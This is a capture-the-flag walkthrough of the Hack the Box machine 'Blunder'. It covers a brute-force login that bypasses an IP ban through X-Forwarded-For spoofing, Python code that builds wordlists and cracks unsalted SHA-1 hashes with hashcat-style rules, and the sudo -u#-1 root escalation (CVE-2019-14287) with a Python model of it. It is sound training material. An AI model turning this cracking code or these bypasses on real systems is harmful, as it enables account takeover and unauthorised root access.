Blunder was an easy machine on Hack the Box. Here's my take on solving the challenge.

User

According to nmap, the webserver should be the only attack surface:

There seems to be some kind of blog on the site:

The admin section suggests it's Bludit CMS:

Additionally, the page source reveals the CMS version:

It's a version known to have an authenticated RCE vulnerability. To exploit it, one first needs valid login credentials.

The login panel is protected against brute-forcing credentials: after a few failed attempts it bans the attacker based on their IP address:

Fortunately there's a known bypass for this mechanism. The backend takes the client IP from the X-Forwarded-For header when it is present, so the attacker can supply a fresh address with every request and the per-IP counter never reaches the ban threshold. The CVE author also published a PoC script; after a few adjustments it was ready to use against the machine:

Unfortunately no password list seemed to work, so more enumeration was required. File enumeration yields an interesting .txt file:

It contains a potential username:

Even with this username the script didn't find the right combination. The final step is to build a custom wordlist from the site's content:

With this list the script finally reveals fergus's password:

With these credentials it's possible to use the Metasploit module to get a shell:

There's another version of Bludit sitting in the /var/www folder.

It contains the unsalted SHA-1 password hash of the user Hugo:

Again, cracking the hash with plain rockyou is not enough. Fortunately hashcat's rule-based attack, which mangles each wordlist entry into variations, produces the right candidate:
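Both steps above, building a wordlist from site text and then mangling it with rules, as one added example that is not the writeup's tooling: a cewl-style extractor over page text, a small interpreter for hashcat rule syntax, and a check of the resulting candidates against an unsalted SHA-1 hash. SAMPLE_HTML, the RULES list and TARGET_HASH are constructed here (the hash is made from "Fortune123" so the run shows a hit); none of them come from the page or the box.

```python
import hashlib
import re
from html.parser import HTMLParser

# Added example (not the writeup's tooling): a cewl-style wordlist built from
# page text, expanded with a few hashcat-syntax rules and checked against an
# unsalted SHA-1 hash. SAMPLE_HTML, RULES and TARGET_HASH are constructed.


class TextExtractor(HTMLParser):
    """Collect visible text, ignoring <script> and <style> bodies."""

    def __init__(self):
        super().__init__()
        self.parts, self._skip = [], False

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip = True

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip = False

    def handle_data(self, data):
        if not self._skip:
            self.parts.append(data)


def words_from_html(html, min_len=4):
    """Unique words of at least min_len characters, in order of appearance."""
    parser = TextExtractor()
    parser.feed(html)
    seen, words = set(), []
    for word in re.findall(r"[A-Za-z][A-Za-z0-9]*", " ".join(parser.parts)):
        if len(word) >= min_len and word not in seen:
            seen.add(word)
            words.append(word)
    return words


# Single-character hashcat rule functions (a subset of the real rule set).
SIMPLE_OPS = {
    ":": lambda w: w,
    "l": str.lower,
    "u": str.upper,
    "c": lambda w: w[:1].upper() + w[1:].lower(),
    "r": lambda w: w[::-1],
    "d": lambda w: w * 2,
    "[": lambda w: w[1:],
    "]": lambda w: w[:-1],
}


def apply_rule(word, rule):
    """Apply a hashcat rule string; supports : l u c r d [ ] $X ^X sXY."""
    i = 0
    while i < len(rule):
        op = rule[i]
        if op in SIMPLE_OPS:
            word = SIMPLE_OPS[op](word)
        elif op == "$":            # append a character
            i += 1
            word += rule[i]
        elif op == "^":            # prepend a character
            i += 1
            word = rule[i] + word
        elif op == "s":            # substitute X with Y
            word = word.replace(rule[i + 1], rule[i + 2])
            i += 2
        elif op != " ":
            raise ValueError("unsupported rule op %r" % op)
        i += 1
    return word


def crack_sha1(target_hex, words, rules):
    """Return the first word+rule candidate whose SHA-1 matches, else None."""
    target_hex = target_hex.lower()
    tried = set()
    for word in words:
        for rule in rules:
            candidate = apply_rule(word, rule)
            if candidate in tried:
                continue
            tried.add(candidate)
            if hashlib.sha1(candidate.encode()).hexdigest() == target_hex:
                return candidate
    return None


# Constructed inputs: a small page, a mini rule set, and a hash of "Fortune123".
SAMPLE_HTML = """<html><head><title>Fortune cookies</title>
<script>var analytics = "not a password";</script></head>
<body><h1>Weekly fortune reviews</h1>
<p>We rate fortune cookies from local restaurants every Friday.</p></body></html>"""
RULES = [":", "l", "u", "c", "c$1", "c$1$2$3", "c$!", "sa@", "r", "d"]
TARGET_HASH = hashlib.sha1(b"Fortune123").hexdigest()

if __name__ == "__main__":
    words = words_from_html(SAMPLE_HTML)
    print(len(words), "words, e.g.", words[:5])
    print("cracked:", crack_sha1(TARGET_HASH, words, RULES))
```

The same idea is what hashcat does with -a 0 plus -r and a rule file such as best64.rule, only much faster and with the full rule language; the interpreter here covers just enough of the syntax to show how a base word like "fortune" becomes "Fortune123". Against a real hash, replace TARGET_HASH with the value pulled from the Bludit users file and feed words_from_html the pages you scraped.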

With these credentials it's possible to grab the user flag:

Privilege escalation

Privilege escalation is actually really simple if one is up to date with recent CVEs. sudo allows Hugo to run bash as any user except root:

sudo is version 1.8.25p1:

According to CVE-2019-14287, running sudo with a negative UID (sudo -u#-1) makes it run the command as root, bypassing the restriction above:
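A check for the conditions above, as an added example and not part of the writeup: it parses the sudoers line and the sudo version the box shows, and models why a target of -u#-1 ends up as root on a version before the fix. The -1 is stored in a uid_t, so it becomes 4294967295; the pre-fix policy check compared that number against the denied entry (!root, uid 0) and found no match, and setresuid() treats the value as "leave unchanged", so the process stays at uid 0. The fixed version 1.8.28 is from the advisory; the PASSWD table and Hugo's uid in it are constructed assumptions.

```python
import re

# Added example, not from the writeup: decide from what the box shows (the
# sudoers line and the sudo version) whether the CVE-2019-14287 bypass
# applies, and model why "-u#-1" lands as root. Hugo's uid in PASSWD is an
# assumption; the fix version (1.8.28) comes from the advisory.

FIXED_VERSION = (1, 8, 28)
UID_T_MAX = 2 ** 32 - 1             # (uid_t)-1: setresuid() treats it as "no change"
PASSWD = {"root": 0, "hugo": 1001}  # constructed name -> uid table


def parse_sudo_version(text):
    """'Sudo version 1.8.25p1' -> (1, 8, 25, 1); a missing pN counts as 0."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text)
    if not m:
        raise ValueError("no sudo version in %r" % text)
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def parse_runas_rule(line):
    """'(ALL, !root) /bin/bash' -> (allowed names, denied names, command)."""
    m = re.search(r"\(([^)]*)\)\s*(\S.*)$", line)
    if not m:
        raise ValueError("no runas spec in %r" % line)
    allowed, denied = [], []
    for entry in (e.strip() for e in m.group(1).split(",")):
        if entry.startswith("!"):
            denied.append(entry[1:])
        elif entry:
            allowed.append(entry)
    return allowed, denied, m.group(2).strip()


def requested_uid(spec):
    """Numeric uid sudo resolves for -u. A '#N' spec is taken literally and
    stored in a uid_t, so -1 becomes 4294967295 instead of being rejected."""
    if spec.startswith("#"):
        return int(spec[1:]) & UID_T_MAX
    return PASSWD[spec]


def policy_permits(spec, allowed, denied):
    """Pre-fix policy check: the target uid is compared against the denied
    entries by uid, so 4294967295 never matches '!root' (uid 0)."""
    uid = requested_uid(spec)
    if any(PASSWD.get(d) == uid for d in denied):
        return False
    return "ALL" in allowed or any(PASSWD.get(a) == uid for a in allowed)


def effective_uid_after_switch(spec, current_uid=0):
    """sudo already runs as root; setresuid(4294967295) is a no-op, so the
    command keeps uid 0. Any other uid is switched to normally."""
    uid = requested_uid(spec)
    return current_uid if uid == UID_T_MAX else uid


def bypass_applies(version_text, rule_line, spec="#-1"):
    """True when `sudo -u<spec> <command>` would run as root even though the
    rule denies root: version is pre-fix, policy passes, and uid stays 0."""
    if parse_sudo_version(version_text)[:3] >= FIXED_VERSION:
        return False                # 1.8.28+ rejects uid -1 / 4294967295
    allowed, denied, _command = parse_runas_rule(rule_line)
    if "root" not in denied or not policy_permits(spec, allowed, denied):
        return False
    return effective_uid_after_switch(spec) == 0


if __name__ == "__main__":
    print(bypass_applies("Sudo version 1.8.25p1", "(ALL, !root) /bin/bash"))  # True
    print(bypass_applies("Sudo version 1.8.28", "(ALL, !root) /bin/bash"))    # False
```

The check says no for three reasons worth keeping separate: a version of 1.8.28 or later (the fix rejects the sentinel uids up front), a rule that does not deny root in the first place (no bypass needed), or a target that the policy actually catches (such as -u root or -u#0). Only the combination of a pre-fix version, a !root runas list and the wrapped -1 returns True, which is exactly the situation on this box.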